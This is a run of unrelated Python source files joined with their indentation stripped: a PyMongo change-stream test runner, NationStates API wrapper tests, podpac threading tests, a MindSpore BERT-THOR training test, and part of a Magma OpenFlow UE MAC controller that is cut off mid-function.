cs_target = db.get_collection(scenario_def["collection_name"])
elif target == "database":
cs_target = client.get_database(scenario_def["database_name"])
elif target == "client":
cs_target = client
else:
raise ValueError("Invalid target in spec")
# Construct change stream kwargs dict
cs_pipeline = test["changeStreamPipeline"]
options = test["changeStreamOptions"]
cs_options = {}
for key, value in iteritems(options):
cs_options[camel_to_snake(key)] = value
# Create and return change stream
return cs_target.watch(pipeline=cs_pipeline, **cs_options)
def run_operation(client, operation):
# Apply specified operations
opname = camel_to_snake(operation["name"])
arguments = operation["arguments"]
cmd = getattr(client.get_database(
operation["database"]).get_collection(
operation["collection"]), opname
)
return cmd(**arguments)
def assert_dict_is_subset(superdict, subdict):
"""Check that subdict is a subset of superdict."""
exempt_fields = ["documentKey", "_id"]
for key, value in iteritems(subdict):
if key not in superdict:
assert False
if isinstance(value, dict):
assert_dict_is_subset(superdict[key], value)
continue
if key in exempt_fields:
superdict[key] = "42"
assert superdict[key] == value
def check_event(event, expectation_dict):
if event is None:
raise AssertionError
for key, value in iteritems(expectation_dict):
if isinstance(value, dict):
assert_dict_is_subset(
getattr(event, key), value
)
else:
assert getattr(event, key) == value
def create_test(scenario_def, test):
def run_scenario(self):
# Set up
self.setUpCluster(scenario_def)
try:
with get_change_stream(
self.client, scenario_def, test
) as change_stream:
for operation in test["operations"]:
# Run specified operations
run_operation(self.client, operation)
num_expected_changes = len(test["result"]["success"])
changes = [
change_stream.next() for _ in range(num_expected_changes)
]
except OperationFailure as exc:
if test["result"].get("error") is None:
raise
expected_code = test["result"]["error"]["code"]
self.assertEqual(exc.code, expected_code)
else:
# Check for expected output from change streams
for change, expected_changes in zip(changes, test["result"]["success"]):
assert_dict_is_subset(change, expected_changes)
self.assertEqual(len(changes), len(test["result"]["success"]))
finally:
# Check for expected events
results = self.listener.results
for expectation in test["expectations"]:
for idx, (event_type, event_desc) in enumerate(iteritems(expectation)):
results_key = event_type.split("_")[1]
event = results[results_key][idx] if len(results[results_key]) > idx else None
check_event(event, event_desc)
return run_scenario
def create_tests():
for dirpath, _, filenames in os.walk(_TEST_PATH):
dirname = os.path.split(dirpath)[-1]
for filename in filenames:
with open(os.path.join(dirpath, filename)) as scenario_stream:
scenario_def = json_util.loads(scenario_stream.read())
test_type = os.path.splitext(filename)[0]
for test in scenario_def['tests']:
new_test = create_test(scenario_def, test)
new_test = client_context.require_no_mmap(new_test)
if 'minServerVersion' in test:
min_ver = tuple(
int(elt) for
elt in test['minServerVersion'].split('.'))
new_test = client_context.require_version_min(*min_ver)(
new_test)
if 'maxServerVersion' in test:
max_ver = tuple(
int(elt) for
elt in test['maxServerVersion'].split('.'))
new_test = client_context.require_version_max(*max_ver)(
new_test)
topologies = test['topology']
new_test = client_context.require_cluster_type(topologies)(
new_test)
test_name = 'test_%s_%s_%s' % (
dirname,
test_type.replace("-", "_"),
str(test['description'].replace(" ", "_")))
new_test.__name__ = test_name
setattr(TestAllScenarios, new_test.__name__, new_test)
create_tests()
if __name__ == '__main__':
unittest.main()
|
test_call.py
|
import unittest
import nationstates as ns
from random import choice
import datetime
USERAGENT = "Automated Testing Builds by Circle CI for the nationstates API wrapper by The United Island Tribes. dolphdevgithub@gmail.com"
import os
test_nation = 'Python Nationstates API wrapper'
test_nation_r = 'pynationstates_telegram_recipient'
PASSWORD = os.environ.get('password')
tgid = os.environ.get('telegram_tgid')
key = os.environ.get('telegram_key')
client_key = os.environ.get('telegram_clientkey')
del os
sep_api = ns.Nationstates(USERAGENT)
joint_api = ns.Nationstates(USERAGENT)
joint_api_enable_beta = ns.Nationstates(USERAGENT, enable_beta=True)
joint_api_use_session = ns.Nationstates(USERAGENT, threading_mode=False)
test_nation_nonauth = joint_api.nation(test_nation)
test_auth_nation = joint_api.nation(test_nation, password=PASSWORD)
test_auth_nation_BETA = joint_api_enable_beta.nation(test_nation, password=PASSWORD)
test_nation_r = joint_api.nation(test_nation_r)
issue_nation_1 = joint_api.nation('Pynationstates Issue Farm 1', password=PASSWORD)
issue_nation_2 = joint_api.nation('Pynationstates Issue Farm 2', password=PASSWORD)
issue_nation_3 = joint_api.nation('Pynationstates Issue Farm 3', password=PASSWORD)
issue_nation_zero = joint_api.nation('pynationstates_0_issues_test_nation', password=PASSWORD)
api_threads = ns.Nationstates(USERAGENT, threading_mode=True)
fake_nation = joint_api.nation('FAKE NATION 1 FAKE NATION 1 FAKE NATION 1 FAKE NATION 1')
fake_region = joint_api.region('FAKE REGION 1 FAKE REGION 1 FAKE REGION 1 FAKE REGION 1')
def grab_id(newfactbookresponse_text):
part1 = newfactbookresponse_text.split('id=')
return part1[1].split('">')[0]
class SetupCallTest(unittest.TestCase):
def test_create_ns(self):
try:
api = ns.Nationstates(USERAGENT)
except Exception as Err:
self.fail(Err)
class SeperateCallTest(unittest.TestCase):
def test_nation_call(self):
try:
api = sep_api
mycall = api.nation("testlandia")
mycall.get_shards(choice(mycall.auto_shards))
mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
self.fail(Err)
def test_nation_region_calls(self):
try:
api = sep_api
mycall = api.nation("testlandia")
myr = mycall.region
myr.nations
api.world().nations
api.world().regions
api.wa('0').nations
except Exception as Err:
self.fail(Err)
def test_beta(self):
from datetime import datetime
now = datetime.now
try:
test_auth_nation_BETA._check_beta()
except Exception as Err:
self.fail(Err)
try:
test_auth_nation._check_beta()
self.fail('beta flag false')
except Exception as Err:
pass
def test_region_call(self):
try:
api = sep_api
mycall = api.region("Balder")
mycall.get_shards(choice(mycall.auto_shards))
mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
self.fail(Err)
def test_world_call(self):
try:
api = sep_api
mycall = api.world()
mycall.get_shards(choice(mycall.auto_shards))
mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
self.fail(Err)
def test_wa_call(self):
try:
api = sep_api
mycall = api.wa("1")
mycall.get_shards(choice(mycall.auto_shards))
mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
self.fail(Err)
def test_cards_indv_call(self):
try:
api = sep_api
mycall = api.cards()
mycall.individual_cards(1, 1)
mycall.individual_cards(1, 1, full_response=True)
mycall.individual_cards(1, 1, 'trades')
mycall.individual_cards(1, 1, ns.Shard('trades'))
mycall.individual_cards(1, 1, (ns.Shard('trades'),))
# mycall.get_shards(choice(mycall.auto_shards))
# mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
raise Err
self.fail(Err)
def test_cards_decks_call(self):
try:
api = sep_api
mycall = api.cards()
mycall.decks(nation_name='testlandia')
mycall.decks(nation_name='testlandia', full_response=True)
mycall.decks(nation_id=1)
# mycall.get_shards(choice(mycall.auto_shards))
# mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
self.fail(Err)
def test_cards_decks_call_null(self):
try:
api = sep_api
mycall = api.cards()
mycall.decks()
self.fail(Err)
# mycall.get_shards(choice(mycall.auto_shards))
# mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
pass
def test_cards_decks_call_both(self):
try:
api = sep_api
mycall = api.cards()
mycall.decks(nation_name='testlandia', nation_id=1)
self.fail('fail')
# mycall.get_shards(choice(mycall.auto_shards))
# mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
pass
def test_cards_decksinfo_call(self):
try:
api = sep_api
mycall = api.cards()
mycall.deck_owner_info(nation_name='testlandia')
mycall.deck_owner_info(nation_name='testlandia', full_response=True)
mycall.deck_owner_info(nation_id=1)
# mycall.get_shards(choice(mycall.auto_shards))
# mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
self.fail(Err)
def test_cards_asks_and_bids_call(self):
try:
api = sep_api
mycall = api.cards()
mycall.asks_and_bids(nation_name='testlandia')
mycall.asks_and_bids(nation_name='testlandia', full_response=True)
mycall.asks_and_bids(nation_id=1)
# mycall.get_shards(choice(mycall.auto_shards))
# mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
self.fail(Err)
def test_cards_collections_call(self):
try:
api = sep_api
mycall = api.cards()
mycall.collections(nation_name='testlandia')
mycall.collections(nation_name='testlandia', full_response=True)
mycall.collections(nation_id=1)
# mycall.get_shards(choice(mycall.auto_shards))
# mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
self.fail(Err)
def test_cards_auctions_call(self):
try:
api = sep_api
mycall = api.cards()
mycall.auctions()
mycall.auctions(full_response=True)
# mycall.get_shards(choice(mycall.auto_shards))
# mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
self.fail(Err)
def test_cards_trades_call(self):
try:
api = sep_api
mycall = api.cards()
mycall.trades()
mycall.trades(full_response=True)
mycall.collections(nation_id=1)
# mycall.get_shards(choice(mycall.auto_shards))
# mycall.get_shards(choice(mycall.auto_shards), full_response=True)
except Exception as Err:
self.fail(Err)
def test_auto_shard_static_n(self):
try:
api = sep_api
mycall = api.nation("testlandia")
mycall.fullname
except Exception as Err:
self.fail(Err)
def test_auto_shard_static_r(self):
try:
api = sep_api
mycall = api.region("balder")
mycall.numnations
except Exception as Err:
self.fail(Err)
def test_auto_shard_static_w(self):
try:
api = sep_api
mycall = api.world()
mycall.numnations
except Exception as Err:
self.fail(Err)
def test_auto_shard_static_wa(self):
try:
api = sep_api
mycall = api.wa("1")
mycall.numnations
except Exception as Err:
self.fail(Err)
class ApiJoinTest(unittest.TestCase):
def test_private_nation(self):
try:
test_auth_nation.get_shards('ping')
except Exception as Err:
self.fail(Err)
def test_exists(self):
assert fake_nation.exists() is False
assert fake_region.exists() is False
assert test_auth_nation.exists()
assert fake_nation.exists() is False
assert test_auth_nation.region.exists()
def test_create_dispatch(self):
from datetime import datetime
now = datetime.now
try:
resp = test_auth_nation_BETA.create_dispatch(title='AUTOMATED ADD DISPATCH TEST', text=str(now()), category=1, subcategory=105, full_response=True)
dispatch_id = grab_id(resp['data']['nation']['success'])
resp = test_auth_nation_BETA.remove_dispatch(dispatch_id=dispatch_id, full_response=True)
resp = test_auth_nation_BETA.create_dispatch(title='AUTOMATED ADD DISPATCH TEST', text=str(now()), category=1, subcategory=105, full_response=False)
dispatch_id = grab_id(resp.success)
resp = test_auth_nation_BETA.remove_dispatch(dispatch_id=dispatch_id, full_response=True)
except Exception as Err:
self.fail(Err)
def test_create_dispatch(self):
from datetime import datetime
now = datetime.now
try:
resp = test_auth_nation_BETA.create_dispatch(title='AUTOMATED ADD DISPATCH TEST', text=str(now()), category=1, subcategory=105, full_response=True)
dispatch_id = grab_id(resp['data']['nation']['success'])
resp = test_auth_nation_BETA.remove_dispatch(dispatch_id=dispatch_id, full_response=True)
resp = test_auth_nation_BETA.create_dispatch(title='AUTOMATED ADD DISPATCH TEST', text=str(now()), category=1, subcategory=105, full_response=False)
dispatch_id = grab_id(resp.success)
resp = test_auth_nation_BETA.remove_dispatch(dispatch_id=dispatch_id, full_response=True)
except Exception as Err:
self.fail(Err)
def test_edit_dispatch(self):
from datetime import datetime
now = datetime.now
try:
resp = test_auth_nation_BETA.create_dispatch(title='AUTOMATED ADD DISPATCH EDIT TEST', text=str(now()), category=1, subcategory=105, full_response=False)
dispatch_id = grab_id(resp.success)
resp = test_auth_nation_BETA.edit_dispatch(dispatch_id=dispatch_id, title='EDIT TEST', text="THIS POST WAS LAST EDITED AT:" + str(now()), category=1, subcategory=111, full_response=False)
resp = test_auth_nation_BETA.remove_dispatch(dispatch_id=dispatch_id, full_response=True)
resp = test_auth_nation_BETA.create_dispatch(title='AUTOMATED ADD DISPATCH EDIT TEST', text=str(now()), category=1, subcategory=105, full_response=False)
dispatch_id = grab_id(resp.success)
resp = test_auth_nation_BETA.edit_dispatch(dispatch_id=dispatch_id, title='EDIT TEST', text="THIS POST WAS LAST EDITED AT:" + str(now()), category=1, subcategory=111, full_response=True)
resp = test_auth_nation_BETA.remove_dispatch(dispatch_id=dispatch_id, full_response=True)
except Exception as Err:
self.fail(Err)
def test_remove_dispatch(self):
from datetime import datetime
now = datetime.now
try:
resp = test_auth_nation_BETA.create_dispatch(title='AUTOMATED ADD DISPATCH REMOVE TEST', text=str(now()), category=1, subcategory=105, full_response=False)
dispatch_id = grab_id(resp.success)
resp = test_auth_nation_BETA.remove_dispatch(dispatch_id=dispatch_id)
resp = test_auth_nation_BETA.create_dispatch(title='AUTOMATED ADD DISPATCH REMOVE TEST', text=str(now()), category=1, subcategory=105, full_response=False)
dispatch_id = grab_id(resp.success)
resp = test_auth_nation_BETA.remove_dispatch(dispatch_id=dispatch_id, full_response=True)
except Exception as Err:
self.fail(Err)
def test_remove_dispatch(self):
from datetime import datetime
now = datetime.now
try:
resp = test_auth_nation_BETA.remove_dispatch(dispatch_id=None, full_response=True)
self.fail('should of failed')
except Exception as Err:
pass
def test_send_rmb(self):
from datetime import datetime
now = datetime.now
try:
test_auth_nation_BETA.send_rmb(test_auth_nation.region, 'Circle CI: Automated Test')
except Exception as Err:
self.fail(Err)
def test_telegram_send(self):
from datetime import datetime
import time
now = datetime.now
try:
telegram = joint_api.telegram(tgid=tgid, key=key, client_key=client_key)
test_nation_r.send_telegram(telegram)
try:
test_nation_r.send_telegram(telegram)
self.fail('API was suppose to block this')
except ns.nsapiwrapper.exceptions.APIRateLimitBan:
pass
try:
telegram.send_telegram(test_nation_r.name)
except ns.nsapiwrapper.exceptions.APIRateLimitBan:
# Just testing code path works - to much wasted time to wait 30 seconds
pass
except Exception as Err:
raise (Err)
def test_pick_issue_always_fail(self):
resp = issue_nation_zero.get_shards('issues')
if resp.issues is None:
pass
else:
self.fail('Nation should have no issues')
def test_pick_issue(self):
import random
def pick_random_nation(*apis):
for api in apis:
resp = api.get_shards('issues')
if resp.issues is None:
continue
random_issue = random.choice(resp.issues.issue)
random_issue_id = random_issue.id
random_option_choice = random.choice(random_issue.option).id
(api.pick_issue(random_issue_id, random_option_choice))
break
nations = [issue_nation_1, issue_nation_2, issue_nation_3]
random.shuffle(nations)
pick_random_nation(*nations)
def test_threads(self):
import threading
import time
nation = api_threads.nation('testlandia')
def HelloWorld():
"""User defined Thread function"""
nation.flag
return
def Main():
threads = [] # Threads list needed when we use a bulk of threads
for i in range(5):
mythread = threading.Thread(target=HelloWorld)
threads.append(mythread)
mythread.start()
for row in threads:
row.join()
assert (nation.api_mother.api.__activerequests__) == 0
Main()
|
test_multithreading.py
|
import os
import sys
import time
from threading import Thread
import pytest
from podpac import settings
from podpac.core.managers.multi_threading import FakeLock, thread_manager
class TestFakeLock(object):
def test_enter_exist_single_thread(self):
lock = FakeLock()
assert lock._locked == False
with lock:
assert lock._locked
assert lock._locked == False
def test_fake_lock_multithreaded(self):
lock = FakeLock()
def f(s):
print("In", s)
with lock:
print("Locked", s)
assert lock._locked
time.sleep(0.05)
print("Unlocked", s)
assert lock._locked == False
if sys.version_info.major == 2:
t1 = Thread(target=lambda: f("thread"))
t2 = Thread(target=lambda: f("thread"))
t1.daemon = True
t2.daemon = True
else:
t1 = Thread(target=lambda: f("thread"), daemon=True)
t2 = Thread(target=lambda: f("thread"), daemon=True)
print("In Main Thread")
f("main1")
print("Starting Thread")
t1.run()
t2.run()
f("main2")
class TestThreadManager(object):
def test_request_release_threads_single_threaded(self):
with settings:
settings["N_THREADS"] = 5
# Requests
n = thread_manager.request_n_threads(3)
assert n == 3
n = thread_manager.request_n_threads(3)
assert n == 2
n = thread_manager.request_n_threads(3)
assert n == 0
# releases
assert thread_manager._n_threads_used == 5
n = thread_manager.release_n_threads(3)
assert n == 3
n = thread_manager.release_n_threads(2)
assert n == 5
n = thread_manager.release_n_threads(50)
assert n == 5
def test_request_release_threads_multi_threaded(self):
def f(s):
print("In", s)
n1 = thread_manager.release_n_threads(s)
time.sleep(0.05)
n2 = thread_manager.release_n_threads(s)
print("Released", s)
assert n2 >= n1
with settings:
settings["N_THREADS"] = 7
if sys.version_info.major == 2:
t1 = Thread(target=lambda: f(5))
t2 = Thread(target=lambda: f(6))
t1.daemon = True
t2.daemon = True
else:
t1 = Thread(target=lambda: f(5), daemon=True)
t2 = Thread(target=lambda: f(6), daemon=True)
f(1)
t1.run()
t2.run()
f(7)
|
test_bert_thor_mlperf.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""test bert thor performance with 8p on mlperf dataset"""
import os
import time
from multiprocessing import Process, Queue
import pytest
import numpy as np
import mindspore.dataset as ds
import mindspore.common.dtype as mstype
import mindspore.communication.management as D
from mindspore import context
from mindspore import log as logger
from mindspore.train.callback import Callback
from mindspore.context import ParallelMode
from mindspore.train.serialization import load_checkpoint, load_param_into_net
import mindspore.dataset.transforms.c_transforms as C
from model_zoo.official.nlp.bert_thor.src.bert_for_pre_training import BertNetworkWithLoss, BertTrainOneStepCell
from model_zoo.official.nlp.bert_thor.src.bert_net_config import bert_net_cfg
from model_zoo.official.nlp.bert_thor.src.config import cfg
from model_zoo.official.nlp.bert_thor.src.lr_generator import get_bert_lr, get_bert_damping
from model_zoo.official.nlp.bert_thor.src.model_thor import Model
from model_zoo.official.nlp.bert_thor.src.thor_for_bert_arg import THOR
MINDSPORE_HCCL_CONFIG_PATH = "/home/workspace/mindspore_config/hccl/rank_table_8p.json"
DATASET_PATH = "/home/workspace/mindspore_dataset/bert/thor/en-wiki-512_test_first1wan"
load_checkpoint_path = ""
data_sink_steps = 100
train_steps = 200
batch_size = 12
np.random.seed(1)
ds.config.set_seed(1)
os.environ['GLOG_v'] = str(2)
class TimeMonitor(Callback):
"""Time Monitor."""
def __init__(self, data_size):
super(TimeMonitor, self).__init__()
self.data_size = data_size
self.epoch_mseconds_list = []
self.per_step_mseconds_list = []
def epoch_begin(self, run_context):
self.epoch_time = time.time()
def epoch_end(self, run_context):
cb_params = run_context.original_args()
epoch_mseconds = (time.time() - self.epoch_time) * 1000
self.epoch_mseconds_list.append(epoch_mseconds)
per_step_mseconds = epoch_mseconds / self.data_size
self.per_step_mseconds_list.append(per_step_mseconds)
print("epoch: {}, per_step_mseconds are {}".format(cb_params.cur_epoch_num, str(per_step_mseconds)), flush=True)
class LossCallback(Callback):
def __init__(self):
super(LossCallback, self).__init__()
self.loss_list = []
def epoch_end(self, run_context):
cb_params = run_context.original_args()
self.loss_list.append(cb_params.net_outputs.asnumpy())
print("epoch: {}, step: {}, outputs are {}".format(cb_params.cur_epoch_num, cb_params.cur_step_num,
str(cb_params.net_outputs)), flush=True)
def create_bert_dataset(device_num=1, rank=0, do_shuffle="true", data_dir=None, schema_dir=None):
"""create train dataset"""
# apply repeat operations
files = os.listdir(data_dir)
data_files = []
for file_name in files:
if "tfrecord" in file_name:
data_files.append(os.path.join(data_dir, file_name))
data_files = sorted(data_files)
data_set = ds.TFRecordDataset(data_files, schema_dir if schema_dir != "" else None,
columns_list=["input_ids", "input_mask", "segment_ids", "next_sentence_labels",
"masked_lm_positions", "masked_lm_ids", "masked_lm_weights"],
shuffle=ds.Shuffle.FILES if do_shuffle == "true" else False,
num_shards=device_num, shard_id=rank, shard_equal_rows=True)
ori_dataset_size = data_set.get_dataset_size()
print('origin dataset size: ', ori_dataset_size)
type_cast_op = C.TypeCast(mstype.int32)
data_set = data_set.map(operations=type_cast_op, input_columns="masked_lm_ids")
data_set = data_set.map(operations=type_cast_op, input_columns="masked_lm_positions")
data_set = data_set.map(operations=type_cast_op, input_columns="next_sentence_labels")
data_set = data_set.map(operations=type_cast_op, input_columns="segment_ids")
data_set = data_set.map(operations=type_cast_op, input_columns="input_mask")
data_set = data_set.map(operations=type_cast_op, input_columns="input_ids")
# apply batch operations
data_set = data_set.batch(batch_size, drop_remainder=True)
logger.info("data size: {}".format(data_set.get_dataset_size()))
logger.info("repeat count: {}".format(data_set.get_repeat_count()))
return data_set
def _set_bert_all_reduce_split():
"""set bert all_reduce fusion split, support num_hidden_layers is 12 and 24."""
from mindspore.parallel._auto_parallel_context import auto_parallel_context
if bert_net_cfg.num_hidden_layers == 12:
if bert_net_cfg.use_relative_positions:
auto_parallel_context().set_all_reduce_fusion_split_indices([29, 58, 87, 116, 145, 174, 203, 217],
"hccl_world_groupsum1")
auto_parallel_context().set_all_reduce_fusion_split_indices([29, 58, 87, 116, 145, 174, 203, 217],
"hccl_world_groupsum3")
else:
auto_parallel_context().set_all_reduce_fusion_split_indices([28, 55, 82, 109, 136, 163, 190, 205],
"hccl_world_groupsum1")
auto_parallel_context().set_all_reduce_fusion_split_indices([28, 55, 82, 109, 136, 163, 190, 205],
"hccl_world_groupsum3")
elif bert_net_cfg.num_hidden_layers == 24:
if bert_net_cfg.use_relative_positions:
auto_parallel_context().set_all_reduce_fusion_split_indices([30, 90, 150, 210, 270, 330, 390, 421],
"hccl_world_groupsum1")
auto_parallel_context().set_all_reduce_fusion_split_indices([30, 90, 150, 210, 270, 330, 390, 421],
"hccl_world_groupsum3")
else:
auto_parallel_context().set_all_reduce_fusion_split_indices([38, 77], "hccl_world_groupsum1")
auto_parallel_context().set_all_reduce_fusion_split_indices([38, 77], "hccl_world_groupsum3")
def train_process_bert_thor(q, device_id, epoch_size, device_num):
os.system("mkdir " + str(device_id))
os.chdir(str(device_id))
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend", device_id=device_id, save_graphs=False)
context.set_context(reserve_class_name_in_scope=False)
context.set_context(max_call_depth=3000)
os.environ['MINDSPORE_HCCL_CONFIG_PATH'] = MINDSPORE_HCCL_CONFIG_PATH
os.environ['RANK_ID'] = str(device_id)
os.environ['RANK_SIZE'] = str(device_num)
D.init()
rank = device_id % device_num
context.reset_auto_parallel_context()
_set_bert_all_reduce_split()
context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL, gradients_mean=True,
device_num=device_num)
bert_net_cfg.num_hidden_layers = 4
data_set = create_bert_dataset(device_num=device_num, rank=rank, do_shuffle=False, data_dir=DATASET_PATH,
schema_dir=None)
net_with_loss = BertNetworkWithLoss(bert_net_cfg, True)
new_repeat_count = epoch_size * data_set.get_dataset_size() // data_sink_steps
new_repeat_count = min(new_repeat_count, train_steps // data_sink_steps)
lr = get_bert_lr()
damping = get_bert_damping()
optimizer = THOR(filter(lambda x: x.requires_grad, net_with_loss.get_parameters()), lr, cfg.Thor.momentum,
filter(lambda x: 'matrix_A' in x.name, net_with_loss.get_parameters()),
filter(lambda x: 'matrix_G' in x.name, net_with_loss.get_parameters()),
cfg.Thor.weight_decay, cfg.Thor.loss_scale, bert_net_cfg.num_hidden_layers,
bert_net_cfg.batch_size, damping)
time_monitor_callback = TimeMonitor(data_sink_steps)
loss_callback = LossCallback()
callback = [time_monitor_callback, loss_callback]
if load_checkpoint_path:
param_dict = load_checkpoint(load_checkpoint_path)
load_param_into_net(net_with_loss, param_dict)
net_with_grads = BertTrainOneStepCell(net_with_loss, optimizer=optimizer)
model = Model(net_with_grads, frequency=cfg.Thor.frequency)
model.train(new_repeat_count, data_set, callbacks=callback, dataset_sink_mode=True, sink_size=data_sink_steps)
loss_list = loss_callback.loss_list
per_step_mseconds = time_monitor_callback.per_step_mseconds_list
q.put({'loss': loss_list, 'cost': per_step_mseconds})
@pytest.mark.level0
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_single
def test_bert_thor_mlperf_8p():
"""test bert thor mlperf 8p"""
q = Queue()
device_num = 8
epoch_size = 2
process = []
for i in range(device_num):
device_id = i
process.append(Process(target=train_process_bert_thor, args=(q, device_id, epoch_size, device_num)))
for i in range(device_num):
process[i].start()
print("Waiting for all subprocesses done...")
for i in range(device_num):
process[i].join()
sum_loss_list = []
sum_cost_list = []
for _ in range(train_steps // data_sink_steps):
sum_loss_list.append(0.0)
sum_cost_list.append(0.0)
for _ in range(device_num):
output = q.get()
loss_list = output['loss']
cost_list = output['cost']
sum_loss_list = np.sum([loss_list, sum_loss_list], axis=0)
sum_cost_list = np.sum([cost_list, sum_cost_list], axis=0)
for j in range(train_steps // data_sink_steps):
print("epoch: ", j, "sum_loss: ", sum_loss_list[j], "sum_cost: ", sum_cost_list[j])
mean_loss = sum_loss_list[-1] / device_num
mean_cost = sum_cost_list[-1] / device_num
for i in range(device_num):
os.system("rm -rf " + str(i))
print("End training...")
assert mean_cost < 64.2
assert mean_loss < 7.9
if __name__ == '__main__':
test_bert_thor_mlperf_8p()
|
ue_mac.py
|
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import threading
from typing import List
from lte.protos.pipelined_pb2 import (
FlowResponse,
SetupFlowsResult,
UEMacFlowRequest,
)
from magma.pipelined.app.base import ControllerType, MagmaController
from magma.pipelined.app.inout import INGRESS
from magma.pipelined.app.ipfix import IPFIXController
from magma.pipelined.bridge_util import BridgeTools
from magma.pipelined.directoryd_client import update_record
from magma.pipelined.imsi import decode_imsi, encode_imsi
from magma.pipelined.openflow import flows
from magma.pipelined.openflow.exceptions import MagmaOFError
from magma.pipelined.openflow.magma_match import MagmaMatch
from magma.pipelined.openflow.registers import IMSI_REG, load_passthrough
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER, set_ev_cls
from ryu.lib.packet import dhcp, ether_types, packet
from ryu.ofproto.inet import IPPROTO_TCP, IPPROTO_UDP
class UEMacAddressController(MagmaController):
"""
UE MAC Address Controller
This controller controls table 0 which is the first table every packet
touches. It matches on UE MAC address and sets IMSI metadata
"""
APP_NAME = "ue_mac"
APP_TYPE = ControllerType.SPECIAL
def __init__(self, *args, **kwargs):
super(UEMacAddressController, self).__init__(*args, **kwargs)
self.tbl_num = self._service_manager.get_table_num(self.APP_NAME)
self.next_table = \
self._service_manager.get_table_num(INGRESS)
self.arpd_controller_fut = kwargs['app_futures']['arpd']
self.arp_contoller = None
self._loop = kwargs['loop']
self._datapath = None
tbls = self._service_manager.allocate_scratch_tables(self.APP_NAME, 2)
self._passthrough_set_tbl = tbls[0]
self._dhcp_learn_scratch = tbls[1]
self._li_port = None
self._imsi_set_tbl_num = \
self._service_manager.INTERNAL_IMSI_SET_TABLE_NUM
self._ipfix_sample_tbl_num = \
self._service_manager.INTERNAL_IPFIX_SAMPLE_TABLE_NUM
self._app_set_tbl_num = self._service_manager.INTERNAL_APP_SET_TABLE_NUM
if 'li_local_iface' in kwargs['config']:
self._li_port = \
BridgeTools.get_ofport(kwargs['config']['li_local_iface'])
self._dpi_port = \
BridgeTools.get_ofport(kwargs['config']['dpi']['mon_port'])
def initialize_on_connect(self, datapath):
self.delete_all_flows(datapath)
self._datapath = datapath
self._install_default_flows()
def cleanup_on_disconnect(self, datapath):
self.delete_all_flows(datapath)
def handle_restart(self, ue_requests: List[UEMacFlowRequest]
) -> SetupFlowsResult:
"""
Setup current check quota flows.
"""
# TODO Potentially we can run a diff logic but I don't think there is
# benefit(we don't need stats here)
self.delete_all_flows(self._datapath)
self._install_default_flows()
for ue_req in ue_requests:
self.add_ue_mac_flow(ue_req.sid.id, ue_req.mac_addr)
self._loop.call_soon_threadsafe(self._setup_arp, ue_requests)
self.init_finished = True
return SetupFlowsResult(result=SetupFlowsResult.SUCCESS)
def _setup_arp(self, ue_requests: List[UEMacFlowRequest]):
if self.arp_contoller or self.arpd_controller_fut.done():
if not self.arp_contoller:
self.arp_contoller = self.arpd_controller_fut.result()
self.arp_contoller.handle_restart(ue_requests)
def delete_all_flows(self, datapath):
flows.delete_all_flows_from_table(datapath, self.tbl_num)
flows.delete_all_flows_from_table(datapath, self._passthrough_set_tbl)
flows.delete_all_flows_from_table(datapath, self._dhcp_learn_scratch)
flows.delete_all_flows_from_table(datapath, self._imsi_set_tbl_num,
cookie=self.tbl_num)
def add_ue_mac_flow(self, sid, mac_addr):
# TODO report add flow result back to sessiond
if self._datapath is None:
return FlowResponse(result=FlowResponse.FAILURE)
uplink_match = MagmaMatch(eth_src=mac_addr)
self._add_resubmit_flow(sid, uplink_match,
priority=flows.UE_FLOW_PRIORITY,
next_table=self._passthrough_set_tbl)
downlink_match = MagmaMatch(eth_dst=mac_addr)
self._add_resubmit_flow(sid, downlink_match,
priority=flows.UE_FLOW_PRIORITY,
next_table=self._passthrough_set_tbl)
# For handling internal ipfix pkt sampling
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
self._add_resubmit_flow(sid, uplink_match,
priority=flows.UE_FLOW_PRIORITY,
tbl_num=self._imsi_set_tbl_num,
cookie=self.tbl_num,
next_table=self._ipfix_sample_tbl_num)
self._add_resubmit_flow(sid, downlink_match,
priority=flows.UE_FLOW_PRIORITY,
tbl_num=self._imsi_set_tbl_num,
cookie=self.tbl_num,
next_table=self._ipfix_sample_tbl_num)
return FlowResponse(result=FlowResponse.SUCCESS)
def delete_ue_mac_flow(self, sid, mac_addr):
# TODO report add flow result back to sessiond
if self._datapath is None:
return
uplink_match = MagmaMatch(eth_src=mac_addr)
self._delete_resubmit_flow(sid, uplink_match)
downlink_match = MagmaMatch(eth_dst=mac_addr)
self._delete_resubmit_flow(sid, downlink_match)
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
self._delete_resubmit_flow(sid, uplink_match,
tbl_num=self._imsi_set_tbl_num)
self._delete_resubmit_flow(sid, downlink_match,
